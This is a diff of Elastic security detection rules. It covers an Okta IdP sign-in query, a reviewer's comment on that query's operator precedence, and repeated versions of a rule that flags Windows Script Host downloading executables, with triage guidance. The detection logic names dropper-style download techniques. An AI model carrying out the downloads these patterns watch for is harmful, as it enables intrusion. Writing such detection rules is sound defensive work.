okta.debug_context.debug_data.request_uri:/oauth2/v1/authorize/callback and\n (not okta.authentication_context.issuer.id:Okta and event.action:(user.authentication.auth_via_IDP\n or user.authentication.auth_via_inbound_SAML\n or user.authentication.auth_via_mfa\n or user.authentication.auth_via_social)\n or event.action:user.session.start) or\n (event.action:user.authentication.auth_via_IDP and okta.outcome.result:FAILURE\n and okta.outcome.reason:(\"A SAML assert with the same ID has already been processed by Okta for a previous request\"\n or \"Unable to match transformed username\"\n or \"Unable to resolve IdP endpoint\"\n or \"Unable to validate SAML Response\"\n or \"Unable to validate incoming SAML Assertion\"))\n", + "references": [ + "https://blog.cloudflare.com/cloudflare-investigation-of-the-january-2022-okta-compromise/", + "https://www.elastic.co/security-labs/testing-okta-visibility-and-detection-dorothy", + "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection", + "https://unit42.paloaltonetworks.com/muddled-libra/" + ], + "related_integrations": [ + { + "package": "okta", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": false, + "name": "okta.authentication_context.issuer.id", + "type": "keyword" + }, + { + "ecs": false, + "name": "okta.debug_context.debug_data.request_uri", + "type": "keyword" + }, + { + "ecs": false, + "name": "okta.outcome.reason", + "type": "keyword" + }, + { + "ecs": false, + "name": "okta.outcome.result", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1ceb05c4-7d25-11ee-9562-f661ea17fbcd", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Use Case: Identity and Access Audit", + "Tactic: Initial 
Access", + "Data Source: Okta" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1199", + "name": "Trusted Relationship", + "reference": "https://attack.mitre.org/techniques/T1199/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 2 + }, + "id": "1ceb05c4-7d25-11ee-9562-f661ea17fbcd_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_104.json b/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_104.json index c6ee27eee4a..2989fdb921f 100644 --- a/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_104.json +++ b/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_104.json 
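Review bot: The `query` depends on KQL precedence in a way that widens its scope beyond what the rule name and `description` state: `and` binds tighter than `or`, so the trailing `or (event.action:user.authentication.auth_via_IDP and okta.outcome.result:FAILURE and okta.outcome.reason:(...))` branch is not constrained by `event.dataset:okta.system` or the `request_uri` filter, and inside the first group `not okta.authentication_context.issuer.id:Okta and event.action:(...) or event.action:user.session.start` makes every `user.session.start` on the callback URI match regardless of issuer. If the intent is sign-ins via a third-party IdP only, wrap the two branches so the dataset filter applies to both and the issuer check applies to `user.session.start` as well, i.e. `event.dataset:okta.system and ((okta.debug_context.debug_data.request_uri:/oauth2/v1/authorize/callback and not okta.authentication_context.issuer.id:Okta and (event.action:(...) or event.action:user.session.start)) or (event.action:user.authentication.auth_via_IDP and okta.outcome.result:FAILURE and okta.outcome.reason:(...)))`; if the wider match is deliberate, the `note` should say so, since an analyst reading the name will assume the narrower meaning. The guide's sentence "This rule detects both the addition of an unauthorized IdP and the subsequent sign-in attempt" is also not supported by the query, which has no IdP-creation event; it should read "This rule detects the sign-in; use the `New Okta Identity Provider (IdP) Added by Admin` rule to locate the IdP creation event", matching the cross-reference the guide already makes further down.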
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Download via Script Interpreter", - "note": "## Triage and analysis\n\n### Investigating Remote File Download via Script Interpreter\n\nThe Windows Script Host (WSH) is a Windows automation technology, which is ideal for non-interactive scripting needs, such as logon scripting, administrative scripting, and machine automation.\n\nAttackers commonly use WSH scripts as their initial access method, acting like droppers for second stage payloads, but can also use them to download tools and utilities needed to accomplish their goals.\n\nThis rule looks for DLLs and executables downloaded using `cscript.exe` or `wscript.exe`.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze both the script and the executable involved using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- The usage of these script engines by regular users is unlikely. 
In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via Script Interpreter\n\nThe Windows Script Host (WSH) is a Windows automation technology, which is ideal for non-interactive scripting needs, such as logon scripting, administrative scripting, and machine automation.\n\nAttackers commonly use WSH scripts as their initial access method, acting like droppers for second stage payloads, but can also use them to download tools and utilities needed to accomplish their goals.\n\nThis rule looks for DLLs and executables downloaded using `cscript.exe` or `wscript.exe`.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze both the script and the executable involved using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- The usage of these script engines by regular users is unlikely. 
In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by host.id, process.entity_id\n [network where host.os.type == \"windows\" and process.name : (\"wscript.exe\", \"cscript.exe\") and network.protocol != \"dns\" and\n network.direction : (\"outgoing\", \"egress\") and network.type == \"ipv4\" and destination.ip != \"127.0.0.1\"\n ]\n [file where host.os.type == \"windows\" and event.type == \"creation\" and file.extension : (\"exe\", \"dll\")]\n", "related_integrations": [ { 
@@ -90,7 +90,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_105.json b/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_105.json
index 61113869feb..45416580945 100644
--- a/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_105.json
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Download via Script Interpreter", - "note": "## Triage and analysis\n\n### Investigating Remote File Download via Script Interpreter\n\nThe Windows Script Host (WSH) is a Windows automation technology, which is ideal for non-interactive scripting needs, such as logon scripting, administrative scripting, and machine automation.\n\nAttackers commonly use WSH scripts as their initial access method, acting like droppers for second stage payloads, but can also use them to download tools and utilities needed to accomplish their goals.\n\nThis rule looks for DLLs and executables downloaded using `cscript.exe` or `wscript.exe`.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze both the script and the executable involved using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result 
!= 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- The usage of these script engines by regular users is unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via Script Interpreter\n\nThe Windows Script Host (WSH) is a Windows automation technology, which is ideal for non-interactive scripting needs, such as logon scripting, administrative scripting, and machine automation.\n\nAttackers commonly use WSH scripts as their initial access method, acting like droppers for second stage payloads, but can also use them to download tools and utilities needed to accomplish their goals.\n\nThis rule looks for DLLs and executables downloaded using `cscript.exe` or `wscript.exe`.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze both the script and the executable involved using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result 
!= 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- The usage of these script engines by regular users is unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "sequence by host.id, process.entity_id\n [network where host.os.type == \"windows\" and process.name : (\"wscript.exe\", \"cscript.exe\") and network.protocol != \"dns\" and\n network.direction : (\"outgoing\", \"egress\") and network.type == \"ipv4\" and destination.ip != \"127.0.0.1\"\n ]\n [file where host.os.type == \"windows\" and event.type == \"creation\" and file.extension : (\"exe\", \"dll\")]\n",
 "related_integrations": [
 {
@@ -90,7 +90,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_106.json b/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_106.json
index 6b2029475a5..4bda7289a0d 100644
--- a/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_106.json
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Download via Script Interpreter", - "note": "## Triage and analysis\n\n### Investigating Remote File Download via Script Interpreter\n\nThe Windows Script Host (WSH) is a Windows automation technology, which is ideal for non-interactive scripting needs, such as logon scripting, administrative scripting, and machine automation.\n\nAttackers commonly use WSH scripts as their initial access method, acting like droppers for second stage payloads, but can also use them to download tools and utilities needed to accomplish their goals.\n\nThis rule looks for DLLs and executables downloaded using `cscript.exe` or `wscript.exe`.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze both the script and the executable involved using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result 
!= 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- The usage of these script engines by regular users is unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via Script Interpreter\n\nThe Windows Script Host (WSH) is a Windows automation technology, which is ideal for non-interactive scripting needs, such as logon scripting, administrative scripting, and machine automation.\n\nAttackers commonly use WSH scripts as their initial access method, acting like droppers for second stage payloads, but can also use them to download tools and utilities needed to accomplish their goals.\n\nThis rule looks for DLLs and executables downloaded using `cscript.exe` or `wscript.exe`.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze both the script and the executable involved using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result 
!= 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- The usage of these script engines by regular users is unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "sequence by host.id, process.entity_id\n [network where host.os.type == \"windows\" and process.name : (\"wscript.exe\", \"cscript.exe\") and network.protocol != \"dns\" and\n network.direction : (\"outgoing\", \"egress\") and network.type == \"ipv4\" and destination.ip != \"127.0.0.1\"\n ]\n [file where host.os.type == \"windows\" and event.type == \"creation\" and file.extension : (\"exe\", \"dll\")]\n",
 "related_integrations": [
 {
@@ -89,7 +89,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_107.json b/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_107.json
index 409e4ebc9c3..39c5dba4936 100644
--- a/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_107.json
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Download via Script Interpreter", - "note": "## Triage and analysis\n\n### Investigating Remote File Download via Script Interpreter\n\nThe Windows Script Host (WSH) is a Windows automation technology, which is ideal for non-interactive scripting needs, such as logon scripting, administrative scripting, and machine automation.\n\nAttackers commonly use WSH scripts as their initial access method, acting like droppers for second stage payloads, but can also use them to download tools and utilities needed to accomplish their goals.\n\nThis rule looks for DLLs and executables downloaded using `cscript.exe` or `wscript.exe`.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze both the script and the executable involved using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result 
